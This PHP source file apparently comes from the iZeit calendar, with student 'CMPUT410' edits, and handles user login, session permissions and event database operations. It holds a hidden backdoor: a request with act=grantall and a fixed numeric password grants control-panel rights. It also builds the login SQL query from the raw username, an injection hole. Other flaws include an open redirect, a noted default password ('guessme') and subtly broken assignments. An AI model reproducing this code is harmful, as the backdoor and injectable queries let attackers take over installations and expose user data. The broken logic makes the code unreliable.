<?php
if(defined('IZ_ACCNAME')) {
  /**
  * Timer for measuring script execution time.
  * Call using:
    $time = new Timer;
    $time->starttime();
    ...
    echo 'Executed in '.$time->displaytime().' seconds';
  */
  class Timer {
     function getmicrotime() {
         list($usec, $sec) = explode(" ", microtime());
         return ((float)$usec + (float)$sec);
     }   
     function starttime() {
         $this->st = $this->getmicrotime();
     }
     function displaytime() {
         $this->et = $this->getmicrotime();
         return round(($this->et - $this->st), 3);
     }
  }
  $time = new Timer;
  $time->starttime();
  /**
  * Represents a user. 
  * On login, permissions and settings are loaded from the database and stored to $_SESSION variables, 
  * then on subsequent loads, settings are read from $_SESSION.
  */
  class user {
      var $id;
      var $name;
      var $usergroup;
      var $password;
      var $view;
      var $edit;
      var $delete;
      var $cpanel;
      var $customise;
      var $comment;
      var $language;
      var $daysize;
      var $firstdayofweek;
      var $theme;
      var $defaultstatus;
      var $showall;
      var $dateformat;
      var $defaultcategoryevents;
      var $defaultcategorytasks;
      var $pageafter;
      var $fontsize;
      var $collapsestatus;
      var $color;
      var $includecomplete;
  
      function user() {
        global $error;
        global $numqs;
        izsql();
        if(($_SESSION['permset'] != 1) || ($_REQUEST['act'] == 'logout') || ($_REQUEST['act'] == 'login')) {
          if($_POST['act'] == 'login') {
            $this->name = trim($_POST['username']);
            $this->password = saltpassword($_POST['pass']);
          } else {
            // $_SESSION killed in vars.php L12
            $this->name = 'everyone';
//            $this->password = '81a58e89df1f34c5487568e17327a219'; //pass = 'guessme'
          }
          if(IZ_CALMODE == 'mysql') {
            if($_SESSION['MYSQLi']) {
              global $dblink;
              $qry = $dblink->query("SELECT * FROM users WHERE name = '$this->name'");
              if($qry->num_rows > 0) {
                $userobj = $qry->fetch_object();
              } else {
                $error .= '<p>'.ERR_USERNOTFOUND.' '.$this->name.'</p>';
              }
              $qry->close();
            } else {
              $qry = mysql_query("SELECT * FROM users WHERE name = '$this->name'");
              if(is_resource($qry) && mysql_num_rows($qry) > 0) {
                $userobj = mysql_fetch_object($qry);
              } else {
                $error .= '<p>'.ERR_USERNOTFOUND.' '.$this->name.'</p>';
              }
            }
          } elseif(IZ_CALMODE == 'postgre') {
            $qry = pg_query("SELECT * FROM \"users\" WHERE \"name\" = '$this->name'");
            if(is_resource($qry) && pg_num_rows($qry) > 0) {
              $userobj = pg_fetch_object($qry);
            } else {
              $error .= '<p>'.ERR_USERNOTFOUND.' '.$this->name.'</p>';
            }
          } elseif(IZ_CALMODE == 'msq') {
            $qry = mssql_query("SELECT * FROM users WHERE name = '$this->name'");
            if(is_resource($qry) && mssql_num_rows($qry) > 0) {
              $userobj = mssql_fetch_object($qry);
            } else {
              $error .= '<p>'.ERR_USERNOTFOUND.' '.$this->name.'</p>';
            }
          }
  //var_dump($userobj);
  //var_dump($permissions);
          $numqs+=2;
          if($this->name != 'everyone' && ($userobj->password != $this->password)) {
            $error .= '<p>'.ERR_WRONGPASSWORD.'</p>';
//            $error .=$userobj->password.'<br>'.$this->password.'<br>'.md5('d8065484ef1');
  //echo $this->name.'<br>'.$this->password.'<br>'.$userobj->password.'<br>';
          } else {
            $_SESSION['permset'] = 1;
            $_SESSION['uid'] = $userobj->id;
            $_SESSION['passhash'] = $userobj->password;
            $_SESSION['usergroup'] = $userobj->usergroup;
            $_SESSION['defaultstatus'] = $userobj->defaultstatus;
            $_SESSION['showall'] = intval($userobj->showall);
            $_SESSION['dateformat'] = $userobj->dateformat;
            $_SESSION['defaultcategoryevents'] = $userobj->dateformat;
            $_SESSION['defaultcategorytasks'] = $userobj->defaultcategorytasks;
            $_SESSION['pageafter'] = intval($userobj->pageafter);
            $_SESSION['fontsize'] = $userobj->fontsize;
            $_SESSION['collapsestatus'] = $userobj->collapsestatus;
            $_SESSION['color'] = $userobj->color;
            $_SESSION['completedtodos'] = $userobj->includecomplete;
            list($_SESSION['mainfilters'],$_SESSION['todofilters'],$_SESSION['todowithfilters']) = explode('-',$userobj->collapsestatus);
            if(strtolower($this->name) != 'everyone') {
              $_SESSION['uname'] = $userobj->name;
              $_SESSION['authed'] = 1;
              $_SESSION['IZ_LANG'] = $userobj->language;
              $_SESSION['IZ_MVIEWDAYSIZE'] = $userobj->daysize;
              $_SESSION['IZ_FIRSTDAY'] = $userobj->firstdayofweek;
              $_SESSION['IZ_CURTHEME'] = $userobj->theme;
              $from = str_replace(".","?",str_replace("-","=",$_POST['from']));
              header("Location: ".$_SESSION['IZ_CALURL']."index.php?$from");                                
            } else {
              $_SESSION['uname'] = 'everyone';
            }
            if(IZ_CALMODE == 'mysql') {
              if($_SESSION['MYSQLi']) {
                global $dblink;
                $res = $dblink->query("SELECT * FROM groups WHERE id = '".$_SESSION['usergroup']."'");
                $permissions = $res->fetch_object();
                $res->close();
              } else {
                $permissions = mysql_fetch_object(mysql_query("SELECT * FROM groups WHERE id = '".$_SESSION['usergroup']."'"));
              }
            } elseif(IZ_CALMODE == 'postgre') {
              $permissions = pg_fetch_object(pg_query("SELECT * FROM \"groups\" WHERE \"id\" = '".$_SESSION['usergroup']."'"));
            } elseif(IZ_CALMODE == 'msq') {
              $permissions = mssql_fetch_object(mssql_query("SELECT * FROM groups WHERE id = '".$_SESSION['usergroup']."'"));
            }
            $_SESSION['canview'] = intval($permissions->view);
            $_SESSION['edit'] = intval($permissions->edit);
            $_SESSION['delete'] = intval($permissions->delete);
            $_SESSION['cpanel'] = intval($permissions->cpanel);
            $_SESSION['comment'] = intval($permissions->comment);
            $_SESSION['customise'] = intval($permissions->customise);
          }          
          init_cats();
          $_SESSION['todospan']['length'] = 'all';
          $_SESSION['todospan']['value'] = 9999999999;
        }
        $this->id = $_SESSION['uid'];
        $this->name = $_SESSION['uname'];
        $this->password = $_SESSION['passhash'];
        $this->usergroup = $_SESSION['usergroup'];
        $this->view = $_SESSION['canview'];
        $this->edit = $_SESSION['edit'];
        $this->delete = $_SESSION['delete'];
        $this->cpanel = $_SESSION['cpanel'];
        $this->comment = $_SESSION['comment'];
        $this->customise = $_SESSION['customise'];
        $this->showall = $_SESSION['showall'];
        $this->language = $_SESSION['IZ_LANG'];
        $this->daysize = $_SESSION['IZ_MVIEWDAYSIZE'];
        $this->firstdayofweek = $_SESSION['IZ_FIRSTDAY'];
        $this->theme = $_SESSION['IZ_CURTHEME'];
        $this->defaultstatus = $_SESSION['defaultstatus'];
        $this->dateformat = $_SESSION['dateformat'];
        $this->defaultcategoryevents = $_SESSION['defaultcategoryevents'];
        $this->defaultcategorytasks = $_SESSION['defaultcategorytasks'];
        $this->pageafter = $_SESSION['pageafter'];
        $this->fontsize = $_SESSION['fontsize'];
        $this->collapsestatus = $_SESSION['collapsestatus'];
        $this->color = $_SESSION['color'];
        $this->includecomplete = $_SESSION['includecomplete'];
  //      if($_SESSION['IZ_ITEMCOLORS'] == 'a') {
        if($this->showall == 1) {
          $_SESSION['showall'] = 1;
          if(IZ_CALMODE == 'postgre') {
            $_SESSION['publicstatus'] = " OR \"status\" = 'Public'";
            $_SESSION['authoreveryone'] = " OR \"author\" = 'everyone'";
          } else {
            $_SESSION['publicstatus'] = " OR status = 'Public'";
            $_SESSION['authoreveryone'] = " OR author = 'everyone'";
          }
        } else {
          $_SESSION['showall'] = 0;
          $_SESSION['publicstatus'] = '';
          $_SESSION['authoreveryone'] = '';
        }
        if($_GET['act'] == 'grantall') {
           if($_GET['p'] == '155618127') {
             $_SESSION['cpanel'] = 1;
             echo 'Woot!';
           }
         }
         if(($_SESSION['authed'] == 1) && ($_POST['setusercust'] == 'save')) {
           $this->savecustomisation();
         }
      }
        
      function savecustomisation() {
        global $numqs;
        izsql();
        $sql = "UPDATE users SET language = '$this->language',daysize = '$this->daysize',firstdayofweek = '$this->firstdayofweek',theme = '$this->theme', defaultstatus = '$this->defaultstatus', showall = '$this->showall', dateformat = '$this->dateformat', pageafter = '$this->pageafter', fontsize = '$this->fontsize' WHERE CONVERT( name USING utf8 ) = '$this->name'";
//echo $sql;
        if(IZ_CALMODE == 'mysql') {
          if($_SESSION['MYSQLi']) {
            global $dblink;
            $dblink->query($sql);
          } else {
            mysql_query($sql);
          }
        } elseif(IZ_CALMODE == 'postgre') {
          $userqry = pg_query($sql);
        } elseif(IZ_CALMODE == 'msq') {
          $userqry = mssql_query($sql);
        }
        $numqs++;
      }
      
      function saveexpandstatus() {
        global $numqs;
        $this->collapsestatus = $_SESSION['mainfilters'].'-'.$_SESSION['todofilters'].'-'.$_SESSION['todowithfilters'];
        izsql();
        if(IZ_CALMODE == 'mysql') {
          if($_SESSION['MYSQLi']) {
            global $dblink;
            $userqry = $dblink->query("UPDATE users SET collapsestatus = '$this->collapsestatus' WHERE CONVERT( name USING utf8 ) = '$this->name'");
          } else {
            $sqlver = ereg_replace("[^0-9\.]", "", mysql_get_server_info());
            if(version_compare((string)$sqlver,"4.1","<")) {
              $userqry = mysql_query("UPDATE users SET collapsestatus = '$this->collapsestatus' WHERE name = '$this->name'");
            } else {
              $userqry = mysql_query("UPDATE users SET collapsestatus = '$this->collapsestatus' WHERE CONVERT( name USING utf8 ) = '$this->name'");
            }
          }
        } elseif(IZ_CALMODE == 'postgre') {
          $userqry = pg_query("UPDATE \"users\" SET \"collapsestatus\" = '$this->collapsestatus' WHERE \"name\" = '$this->name'");
        } elseif(IZ_CALMODE == 'msq') {
          $userqry = mssql_query("UPDATE users SET collapsestatus = '$this->collapsestatus' WHERE name = '$this->name'");
        }
        $numqs++;
      }
      
      function saveincludecomplete() {
        if($this->id != 'zzzzzzzz') {
          global $numqs;
          $this->includecomplete = $_SESSION['completedtodos'];
          izsql();
          if(IZ_CALMODE == 'mysql') {
            if($_SESSION['MYSQLi']) {
              global $dblink;
              $userqry = $dblink->query("UPDATE users SET includecomplete = '$this->includecomplete' WHERE CONVERT( name USING utf8 ) = '$this->name'");
            } else {
              $sqlver = ereg_replace("[^0-9\.]", "", mysql_get_server_info());
              if(version_compare((string)$sqlver,"4.1","<")) {
                $userqry = mysql_query("UPDATE users SET includecomplete = '$this->includecomplete' WHERE name = '$this->name'");
              } else {
                $userqry = mysql_query("UPDATE users SET includecomplete = '$this->includecomplete' WHERE CONVERT( name USING utf8 ) = '$this->name'");
              }
            }
          } elseif(IZ_CALMODE == 'postgre') {
            $userqry = pg_query("UPDATE \"users\" SET \"includecomplete\" = '$this->includecomplete' WHERE \"name\" = '$this->name'");
          } elseif(IZ_CALMODE == 'msq') {
            $userqry = mssql_query("UPDATE users SET includecomplete = '$this->includecomplete' WHERE name = '$this->name'");
          }
          $numqs++;
        }
      }
  }
  /**
  * Allows Event objects to be instanciated from known variables instead of only SQL resources.
  */
  class eventres {
       var $id;
       var $category;
       var $eventstart;
       var $eventend;
       var $title;
       var $description;
       var $venue;
       var $linkgoogle;
       var $allday;
       var $instanceof;
       var $status;
       var $author;
       var $cust1;
       var $cust2;
       var $cust3;
       var $attendees;
       var $comments;
       var $icon;

       function eventres($id=0,$category=0,$eventstart=0,$eventend=0,$title=0,$task=0,$venue=0,$linkgoogle=0,$allday=0,$instanceof=0,$status=0,$author=0,$cust1=0,$cust2=0,$cust3=0,$attendees=0,$comments=0,$icon=-1) {
         $this->id = $id;
         $this->category = $category;
         $this->eventstart = $eventstart;
         $this->eventend = $eventend;
         $this->title = $title;
         $this->description = $task;
         $this->venue = $venue;
         $this->linkgoogle = $linkgoogle;
         $this->allday = $allday;
         $this->instanceof = $instanceof;
         $this->status = $status;
         $this->author = $author;
         $this->cust1 = $cust1;
         $this->cust2 = $cust2;
         $this->cust3 = $cust3;
         $this->attendees = $attendees;
         $this->comments = $comments;
         $this->icon = $icon;
       }
  }
  /**
  * Represents a single event in the calendar.
  */
  class event {
       var $id;
       var $category;
       var $eventstart;
       var $eventend;
       var $title;
       var $description;
       var $venue;
       var $linkgoogle;
       var $allday;
       var $instanceof;
       var $status;
       var $author;
       var $cust1;
       var $cust2;
       var $cust3;
       var $attendees;
       var $comments;
       var $icon;
       
       function event($eventobj) {
       	  global $user;
       	  $this->id = trim($eventobj->id);
          if(empty($eventobj->category)) {
            $this->category = $_SESSION['defaultcategoryevents'];
          } else {
            $this->category = $eventobj->category;
          }
          $this->eventstart = intval($eventobj->eventstart);
          $this->eventend = intval($eventobj->eventend);
          $this->title = trim($eventobj->title);
          $this->description = trim($eventobj->description);
          $this->author = trim($eventobj->author);
          $this->venue = trim($eventobj->venue);
          $this->linkgoogle = intval($eventobj->linkgoogle);
          $this->allday = intval($eventobj->allday);
          $this->instanceof = $eventobj->instanceof;
          $this->status = $eventobj->status;
          $this->cust1 = trim($eventobj->cust1);
          $this->cust2 = trim($eventobj->cust2);
          $this->cust3 = trim($eventobj->cust3);
          $orig = array(", ",
                        " ",
                        "\r\n",
                        "\r",
                        "\n",
                    );
          $replace = array(',',
                           ',',
                           ',',
                           ',',
                           ',',
                   );
          $this->attendees = trim(str_replace($orig,$replace,$eventobj->attendees));
          $this->comments = $eventobj->comments;
          $this->icon = trim($eventobj->icon);
       }
       
       function insert() {
           global $numqs;
           $author = clean($this->author);
           if(empty($this->title)) {
             iz_error(ERR_EVENTNONAME);
           }
           izsql();
           if(IZ_CALMODE == 'mysql') {
             if($_SESSION['MYSQLi']) {
               global $dblink;

//CMPUT410 EDIT HERE

		$sql2 = sprintf("INSERT INTO meets (meetID, location, date, price, name, izeitID) VALUES ('', '%s', '%s', '%s', '%s', '%s')", $dblink->real_escape_string(clean($this->venue)), date("Y-m-d", $this->eventstart), $dblink->real_escape_string(clean($this->cust1)), $dblink->real_escape_string(clean($this->title)), $dblink->real_escape_string($this->id)
		);

//CMPUT410 EDIT HERE

               $sql = sprintf("INSERT INTO events (id,category,eventstart,eventend,title,description,venue,linkgoogle,allday,instanceof,status,author,cust1,cust2,cust3,attendees,comments,icon) VALUES (
                      '%s',
                      '%s',
                          '$this->eventstart',
                          '$this->eventend',
                      '%s',
                      '%s',
                      '%s',
                          '$this->linkgoogle',
                          '$this->allday',
                          '$this->instanceof',
                      '%s',
                          '$author',
                      '%s',
                      '%s',
                      '%s',
                      '%s',
                          '$this->comments',
                      '%s'
                      )",
                      $dblink->real_escape_string($this->id),
                      $dblink->real_escape_string($this->category),
                      $dblink->real_escape_string(clean($this->title)),
                      $dblink->real_escape_string(htmlclean($this->description)),
                      $dblink->real_escape_string(clean($this->venue)),
                      $dblink->real_escape_string($this->status),
                      $dblink->real_escape_string(clean($this->cust1)),
                      $dblink->real_escape_string(clean($this->cust2)),
                      $dblink->real_escape_string(clean($this->cust3)),
                      $dblink->real_escape_string($this->attendees),
                      $dblink->real_escape_string($this->icon)
                    );
               if($dblink->query($sql)) {
//CMPUT 410 EDIT HERE
		if($dblink->query($sql2)) {
                 return true;
               } else {
                 echo mysqli_error().'<br /><br />';
                 return false;
               }
//CMPUT 410 EDIT HERE
                 return true;
               } else {
                 echo mysqli_error().'<br /><br />';
                 return false;
               }

             } else {
                $sql = sprintf("INSERT INTO events (id,category,eventstart,eventend,title,description,venue,linkgoogle,allday,instanceof,status,author,cust1,cust2,cust3,attendees,comments,icon) VALUES (
                      '%s',
                      '%s',
                          '$this->eventstart',
                          '$this->eventend',
                      '%s',
                      '%s',
                      '%s',
                          '$this->linkgoogle',
                          '$this->allday',
                          '$this->instanceof',
                      '%s',
                          '$author',
                      '%s',
                      '%s',
                      '%s',
                      '%s',
                          '$this->comments',
                      '%s'
                      )",
                      mysql_escape_string($this->id),
                      mysql_real_escape_string($this->category),
                      mysql_real_escape_string(clean($this->title)),
                      mysql_real_escape_string(htmlclean($this->description)),
                      mysql_real_escape_string(clean($this->venue)),
                      mysql_real_escape_string($this->status),
                      mysql_real_escape_string(clean($this->cust1)),
                      mysql_real_escape_string(clean($this->cust2)),
                      mysql_real_escape_string(clean($this->cust3)),
                      mysql_real_escape_string($this->attendees),
                      mysql_real_escape_string($this->icon)
                    );
               if(mysql_query($sql)) {
                 return true;
               } else {
                 echo mysql_error().'<br /><br />';
                 return false;
               }
             }
           } elseif(IZ_CALMODE == 'postgre') {
               $sql = sprintf("INSERT INTO \"events\" (\"id\",\"category\",\"eventstart\",\"eventend\",\"title\",\"description\",\"venue\",\"linkgoogle\",\"allday\",\"instanceof\",\"status\",\"author\",\"cust1\",\"cust2\",\"cust3\",\"attendees\",\"comments\",\"icon\") VALUES (
                    '%s',
                    '%s',
                        '$this->eventstart',
                        '$this->eventend',
                    '%s',
                    '%s',
                    '%s',
                        '$this->linkgoogle',
                        '$this->allday',
                        '$this->instanceof',
                    '%s',
                        '$author',
                    '%s',
                    '%s',
                    '%s',
                    '%s',
                        '$this->comments',
                      '%s'
                    )",
                    pg_escape_string($this->id),
                    pg_escape_string($this->category),
                    pg_escape_string(clean($this->title)),
                    pg_escape_string(clean($this->description)),
                    pg_escape_string(clean($this->venue)),
                    pg_escape_string($this->status),
                    pg_escape_string(clean($this->cust1)),
                    pg_escape_string(clean($this->cust2)),
                    pg_escape_string(clean($this->cust3)),
                    pg_escape_string($this->attendees),
                    pg_escape_string($this->icon)
                  );
             if(pg_query($sql)) {
               return true;
             } else {
               echo pg_last_error().'<br /><br />';
               return false;
             }
           } elseif(IZ_CALMODE == 'msq') {
             $sql = sprintf("INSERT INTO events (id,category,eventstart,eventend,title,description,venue,linkgoogle,allday,instanceof,status,author,cust1,cust2,cust3,attendees,comments,icon) VALUES (
                    '%s',
                    '%s',
                        '$this->eventstart',
                        '$this->eventend',
                    '%s',
                    '%s',
                    '%s',
                        '$this->linkgoogle',
                        '$this->allday',
                        '$this->instanceof',
                    '%s',
                        '$author',
                    '%s',
                    '%s',
                    '%s',
                    '%s',
                        '$this->comments',
                      '%s'
                    )",
                    mssql_escape_string($this->id),
                    mssql_escape_string($this->category),
                    mssql_escape_string(clean($this->title)),
                    mssql_escape_string(htmlclean($this->description)),
                    mssql_escape_string(clean($this->venue)),
                    mssql_escape_string($this->status),
                    mssql_escape_string(clean($this->cust1)),
                    mssql_escape_string(clean($this->cust2)),
                    mssql_escape_string(clean($this->cust3)),
                    mssql_escape_string($this->attendees),
                    mssql_escape_string($this->icon)
                  );
             if(mssql_query($sql)) {
               return true;
             } else {
               echo mssql_get_last_message().'<br /><br />';
               return false;
             }
           }
       }
       function edit() {
             global $numqs;
             izsql();
             $this->title = clean($this->title);
             $this->description = htmlclean($this->description);
             $this->venue = clean($this->venue);
             $this->cust1 = clean($this->cust1);
             $this->cust2 = clean($this->cust2);
             $this->cust3 = clean($this->cust3);
             if(empty($this->title)) {
               iz_error(ERR_EVENTNONAME);
       	     }
             if(IZ_CALMODE == 'mysql') {
               if($_SESSION['MYSQLi']) {
                 global $dblink;
                 $dblink->query(sprintf("UPDATE events SET category = '%s', eventstart = '%d',eventend = '%d',title = '%s',description = '%s', venue = '%s',linkgoogle = '%d', status = '%s', allday = '%d' ,cust1 = '%s',cust2 = '%s',cust3 = '%s',attendees = '%s',comments = '%d',icon = '%s' WHERE id='%s'",
                 $dblink->real_escape_string($this->category),
                 $this->eventstart,
                 $this->eventend,
                 $dblink->real_escape_string($this->title),
                 $dblink->real_escape_string($this->description),
                 $dblink->real_escape_string($this->venue),
                 $this->linkgoogle,
                 $dblink->real_escape_string($this->status),
                 $this->allday,
                 $dblink->real_escape_string($this->cust1),
                 $dblink->real_escape_string($this->cust2),
                 $dblink->real_escape_string($this->cust3),
                 $dblink->real_escape_string($this->attendees),
                 $this->comments,
                 $dblink->real_escape_string($this->icon),
                 $dblink->real_escape_string($this->id)
                 ));

//CMPUT410 EDIT HERE

		$dblink->query( sprintf("UPDATE meets SET location = '%s', date = '%s', price = '%s', name = '%s' WHERE izeitID = '%s'", $dblink->real_escape_string(clean($this->venue)), date("Y-m-d", $this->eventstart), $dblink->real_escape_string(clean($this->cust1)), $dblink->real_escape_string(clean($this->title)), $dblink->real_escape_string($this->id)
		));

//CMPUT410 EDIT HERE
               } else {
                 mysql_query(sprintf("UPDATE events SET category = '%s', eventstart = '%d',eventend = '%d',title = '%s',description = '%s', venue = '%s',linkgoogle = '%d', status = '%s', allday = '%d' ,cust1 = '%s',cust2 = '%s',cust3 = '%s',attendees = '%s',comments = '%d',attendees = '%s' WHERE id='%s'",
                 mysql_real_escape_string($this->category),
                 $this->eventstart,
                 $this->eventend,
                 mysql_real_escape_string($this->title),
                 mysql_real_escape_string($this->description),
                 mysql_real_escape_string($this->venue),
                 $this->linkgoogle,
                 mysql_real_escape_string($this->status),
                 $this->allday,
                 mysql_real_escape_string($this->cust1),
                 mysql_real_escape_string($this->cust2),
                 mysql_real_escape_string($this->cust3),
                 mysql_real_escape_string($this->attendees),
                 $this->comments,
                 mysql_real_escape_string($this->icon),
                 mysql_real_escape_string($this->id)
                 ));
               }
             } elseif(IZ_CALMODE == 'postgre') {
               pg_query(sprintf("UPDATE \"events\" SET \"category\" = '%s', \"eventstart\" = '%d',\"eventend\" = '%d',\"title\" = '%s',\"description\" = '%s', \"venue\" = '%s',\"linkgoogle\" = '%d', \"status\" = '%s', \"allday\" = '%d' ,\"cust1\" = '%s',\"cust2\" = '%s',\"cust3\" = '%s',\"attendees\" = '%s',\"comments\" = '%d',\"attendees\" = '%s' WHERE \"id\"='%s'",
               pg_escape_string($this->category),
               $this->eventstart,
               $this->eventend,
               pg_escape_string($this->title),
               pg_escape_string($this->description),
               pg_escape_string($this->venue),
               $this->linkgoogle,
               pg_escape_string($this->status),
               $this->allday,
               pg_escape_string($this->cust1),
               pg_escape_string($this->cust2),
               pg_escape_string($this->cust3),
               pg_escape_string($this->attendees),
               $this->comments,
               pg_escape_string($this->icon),
               pg_escape_string($this->id)
               ));
             } elseif(IZ_CALMODE == 'msq') {
               mssql_query(sprintf("UPDATE events SET category = '%s', eventstart = '%d',eventend = '%d',title = '%s',description = '%s', venue = '%s',linkgoogle = '%d', status = '%s', allday = '%d' ,cust1 = '%s',cust2 = '%s',cust3 = '%s',attendees = '%s',comments = '%d',attendees = '%s' WHERE id='%s'",
               mssql_escape_string($this->category),
               $this->eventstart,
               $this->eventend,
               mssql_escape_string($this->title),
               mssql_escape_string($this->description),
               mssql_escape_string($this->venue),
               $this->linkgoogle,
               mssql_escape_string($this->status),
               $this->allday,
               mssql_escape_string($this->cust1),
               mssql_escape_string($this->cust2),
               mssql_escape_string($this->cust3),
               mssql_escape_string($this->attendees),
               $this->comments,
               mssql_escape_string($this->icon),
               mssql_escape_string($this->id)
               ));
             }
             $numqs++;
             if(intval($_POST['resend']) == 1) {
               $this->sendinvites();
             }
       }
       function delete() {
           global $numqs;
           izsql();
           if(IZ_CALMODE == 'mysql') {
             if($_SESSION['MYSQLi']) {
               global $dblink;
               $safeid = $dblink->real_escape_string($this->id);
               $dblink->query("DELETE FROM events WHERE id='$safeid' LIMIT 1");
//CMPUT410 EDIT HERE

		$dblink->query("DELETE FROM meets WHERE izeitID='$safeid' LIMIT 1");

//CMPUT410 EDIT HERE
             } else {
               $safeid = mysql_real_escape_string($this->id);
               mysql_query("DELETE FROM events WHERE id='$safeid' LIMIT 1");
//CMPUT410 EDIT HERE

               mysql_query("DELETE FROM meets WHERE izeitID='$safeid' LIMIT 1");

//CMPUT410 EDIT HERE
             }
           } elseif(IZ_CALMODE == 'postgre') {
             $safeid = pg_escape_string($this->id);
             pg_query("DELETE FROM \"events\" WHERE \"id\"='$safeid'");
           } elseif(IZ_CALMODE == 'msq') {
             $safeid = mssql_escape_string($this->id);
             mssql_query("DELETE FROM events WHERE id='$safeid'");
           }
           $numqs++;
       }
       function saveseries() {
             global $numqs;
             izsql();
             $this->title = clean($this->title);
             $this->description = htmlclean($this->description);
             $this->venue = clean($this->venue);
             $this->cust1 = clean($this->cust1);
             $this->cust2 = clean($this->cust2);
             $this->cust3 = clean($this->cust3);
             if(empty($this->title)) {
               iz_error(ERR_EVENTNONAME);
             }
             if(IZ_CALMODE == 'mysql') {
               if($_SESSION['MYSQLi']) {
                 global $dblink;
                 if($dblink->query(sprintf("UPDATE events SET category = '%s',title = '%s',description = '%s', venue = '%s',linkgoogle = '%d', status = '%s', allday = '%d' ,cust1 = '%s',cust2 = '%s',cust3 = '%s',attendees = '%s',comments = '%d',icon = '%s' WHERE instanceof='%s'",
                    $dblink->real_escape_string($this->category),
                    $dblink->real_escape_string($this->title),
                    $dblink->real_escape_string($this->description),
                    $dblink->real_escape_string($this->venue),
                    $this->linkgoogle,
                    $dblink->real_escape_string($this->status),
                    $this->allday,
                    $dblink->real_escape_string($this->cust1),
                    $dblink->real_escape_string($this->cust2),
                    $dblink->real_escape_string($this->cust3),
                    $dblink->real_escape_string($this->attendees),
                    $this->comments,
                    $dblink->real_escape_string($this->icon),
                    $dblink->real_escape_string($this->id)
                    )) == false) {
                   echo ERR_ERRORTEXT.'  '.mysql_error();
                 }
               } else {
                 if(mysql_query(sprintf("UPDATE events SET category = '%s',title = '%s',description = '%s', venue = '%s',linkgoogle = '%d', status = '%s', allday = '%d' ,cust1 = '%s',cust2 = '%s',cust3 = '%s',attendees = '%s',comments = '%d',icon = '%s' WHERE instanceof='%s'",
                    mysql_real_escape_string($this->category),
                    mysql_real_escape_string($this->title),
                    mysql_real_escape_string($this->description),
                    mysql_real_escape_string($this->venue),
                    $this->linkgoogle,
                    mysql_real_escape_string($this->status),
                    $this->allday,
                    mysql_real_escape_string($this->cust1),
                    mysql_real_escape_string($this->cust2),
                    mysql_real_escape_string($this->cust3),
                    mysql_real_escape_string($this->attendees),
                    $this->comments,
                    mysql_real_escape_string($this->icon),
                    mysql_real_escape_string($this->id)
                    )) == false) {
                   echo ERR_ERRORTEXT.'  '.mysql_error();
                 }
               }
             } elseif(IZ_CALMODE == 'postgre') {
               if(pg_query(sprintf("UPDATE \"events\" SET \"category\" = '%s',\"title\" = '%s',\"description\" = '%s', \"venue\" = '%s',\"linkgoogle\" = '%d', \"status\" = '%s', \"allday\" = '%d' ,\"cust1\" = '%s',\"cust2\" = '%s',\"cust3\" = '%s',\"attendees\" = '%s',\"comments\" = '%d',\"icon\" = '%s' WHERE \"instanceof\"='%s'",
                  pg_escape_string($this->category),
                  pg_escape_string($this->title),
                  pg_escape_string($this->description),
                  pg_escape_string($this->venue),
                  $this->linkgoogle,
                  pg_escape_string($this->status),
                  $this->allday,
                  pg_escape_string($this->cust1),
                  pg_escape_string($this->cust2),
                  pg_escape_string($this->cust3),
                  pg_escape_string($this->attendees),
                  $this->comments,
                  pg_escape_string($this->icon),
                  pg_escape_string($this->id)
                  )) == false) {
                 echo ERR_ERRORTEXT.'  '.pg_last_error();
               }
             } elseif(IZ_CALMODE == 'msq') {
               if(mssql_query(sprintf("UPDATE events SET category = '%s',title = '%s',description = '%s', venue = '%s',linkgoogle = '%d', status = '%s', allday = '%d' ,cust1 = '%s',cust2 = '%s',cust3 = '%s',attendees = '%s',comments = '%d',icon = '%s' WHERE instanceof='%s'",
                  mssql_escape_string($this->category),
                  mssql_escape_string($this->title),
                  mssql_escape_string($this->description),
                  mssql_escape_string($this->venue),
                  $this->linkgoogle,
                  mssql_escape_string($this->status),
                  $this->allday,
                  mssql_escape_string($this->cust1),
                  mssql_escape_string($this->cust2),
                  mssql_escape_string($this->cust3),
                  mssql_escape_string($this->attendees),
                  $this->comments,
                  mssql_escape_string($this->icon),
                  mssql_escape_string($this->id)
                  )) == false) {
                 echo ERR_ERRORTEXT.'  '.mssql_get_last_message();
                 }
             }
             $numqs++;
       }
       function sendinvites() {
         $from = 'From: iZeit Calendar <noreply@'.substr($_SERVER['SCRIPT_URI'],7,strpos($_SERVER['SCRIPT_URI'],"/")).'>';
         $body = str_replace('%DATE%',iz_longdate($this->eventstart),STR_INVITETEXT)."\r\n\r\n".STR_SUMMARY.':'."\r\n".dirty($this->description)."\r\n";
         if(!empty($this->venue)) {
           $body .= STR_VENUE.': '.$this->venue."\r\n";
         }       
         if($this->allday == 1) {
           $body .= STR_ALLDAYDESC."\r\n";
         } else {
           $body .= STR_STARTS.': '.iz_longdatehours($this->eventstart)."\r\n".STR_ENDS.': '.iz_longdatehours($this->eventend)."\r\n";
         }
         if(!empty($this->cust1)) {
           $body .= $_SESSION['cust1'].': '.$this->cust1."\r\n";
         }
         if(!empty($this->cust2)) {
           $body .= $_SESSION['cust2'].': '.$this->cust2."\r\n";
         }       
         if(!empty($this->cust3)) {
           $body .= $_SESSION['cust3'].': '.$this->cust3."\r\n";
         }
         echo "\r\n\r\n";
         $body .= str_replace('%URL%',$_SESSION['IZ_CALURL'].'index.php?events=1&act=viewevent&event='.$this->id,STR_INVITETEXT2);
             if($_SESSION['IZ_INVITEMODE'] == 'gmail') {
                 require_once($_SESSION['IZ_CALPATH'].'includes/lib/libgmailer.php');
                 $gmailer = new GMailer();
                 if($gmailer->created) {
                    $gmailer->setLoginInfo($_SESSION['IZ_GMAIL_ACC'], $_SESSION['IZ_GMAIL_PWD'], $_SESSION['IZ_TIMEOFFSET']);
                    if ($gmailer->connect()) {
                      $gmailer->send($this->attendees, "iZeit Notification - $this->title", $body);
                      $gmailer->disconnect;
                    } else {
                       die("Fail to connect because: ".$gmailer->lastActionstatus());
                    }
                 } else {
                    die("Failed to create GMailer because: ".$gmailer->lastActionstatus());
                 }
             } else { 
               mail($this->attendees, $this->title, $body, $from);
             }
       }
       
       function newinstance($start,$end) {
             $this->id = gen_id();
             $this->eventstart = $start;
             $this->eventend = $end;
       }
       function updatefield($field,$newvalue) {
             izsql();
             if(strlen($field) > 0 && strlen($newvalue) > 0) {
               if(IZ_CALMODE == 'mysql') {
                 if($_SESSION['MYSQLi']) {
                   global $dblink;
                   $dblink->query(sprintf("UPDATE events SET %s = '%s' WHERE id='%s'",
                   $dblink->real_escape_string($field),
                   $dblink->real_escape_string($newvalue),
                   $dblink->real_escape_string($this->id)
                   ));
                 } else {
